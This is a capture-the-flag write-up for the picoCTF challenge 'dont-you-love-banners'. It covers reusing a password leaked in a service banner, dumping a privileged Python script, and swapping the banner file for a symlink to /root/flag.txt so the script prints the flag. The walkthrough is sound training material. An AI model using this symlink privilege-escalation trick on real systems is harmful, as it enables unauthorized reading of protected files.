dont-you-love-banners

Description

Can you abuse the banner?The server has been leaking some crucial information on tethys.picoctf.net 64344. Use the leaked information to get to the server.To connect to the running application use nc tethys.picoctf.net 56677. From the above information abuse the machine and find the flag in the /root directory.

---

Steps :

so once i connect to first domain using netcat i see a password.

╰─❯ nc tethys.picoctf.net 64344                                              
SSH-2.0-OpenSSH_7.6p1 My_Passw@rd_@1234

and i tried to login to next server using netcat and it asked for a password, so i entered the previous one and it worked

╰─❯ nc tethys.picoctf.net 56677                                             
*************************************
**************WELCOME****************
*************************************
 
what is the password?
My_Passw@rd_@1234
What is the top cyber security conference in the world?
defcon
the first hacker ever was known for phreaking(making free phone calls), who was it?
john
player@challenge:~$ ls
ls
cd banner  text
player@challenge:~$ /root
cd /root
player@challenge:/root$ ls
ls
flag.txt  script.py
player@challenge:/root$ cat flag.txt
cat flag.txt
cat: flag.txt: Permission denied
player@challenge:/root$ cat script.py
cat script.py
 
import os
import pty
 
incorrect_ans_reply = "Lol, good try, try again and good luck\n"
 
if __name__ == "__main__":
    try:
      with open("/home/player/banner", "r") as f:
        print(f.read())
    except:
      print("*********************************************")
      print("***************DEFAULT BANNER****************")
      print("*Please supply banner in /home/player/banner*")
      print("*********************************************")
 
try:
    request = input("what is the password? \n").upper()
    while request:
        if request == 'MY_PASSW@RD_@1234':
            text = input("What is the top cyber security conference in the world?\n").upper()
            if text == 'DEFCON' or text == 'DEF CON':
                output = input(
                    "the first hacker ever was known for phreaking(making free phone calls), who was it?\n").upper()
                if output == 'JOHN DRAPER' or output == 'JOHN THOMAS DRAPER' or output == 'JOHN' or output== 'DRAPER':
                    scmd = 'su - player'
                    pty.spawn(scmd.split(' '))
 
                else:
                    print(incorrect_ans_reply)
            else:
                print(incorrect_ans_reply)
        else:
            print(incorrect_ans_reply)
            break
 
except:
    KeyboardInterrupt
 
player@challenge:/root$

Analysis of script.py

1. Banner File:

   • The script reads a banner from /home/player/banner.

   • If the banner file is missing, it displays a default banner.

2. Password Check:

   • The script asks for a password and checks if it matches MY_PASSW@RD_@1234 (case-insensitive).

3. Security Questions:

   • If the password is correct, it asks two security questions:

     • “What is the top cyber security conference in the world?” (Answer: DEFCON or DEF CON).

     • “The first hacker ever was known for phreaking (making free phone calls), who was it?” (Answer: JOHN DRAPER, JOHN THOMAS DRAPER, JOHN, or DRAPER).

4. Privilege Escalation:

   • If all answers are correct, the script runs su - player to switch to the player user.

Exploitation plan

Since you cannot directly read /root/flag.txt, you need to escalate privileges or trick the script into giving you access.

so we can remove the existing banner and create a symlink for /root/flag.txt

player@challenge:~$ rm /home/player/banner
player@challenge:~$ ln -s /root/flag.txt /home/player/banner

and now try to reconnect :

╰─❯ nc tethys.picoctf.net 56677                                              
picoCTF{b4nn3r_gr4bb1n9_su((3sfu11y_******}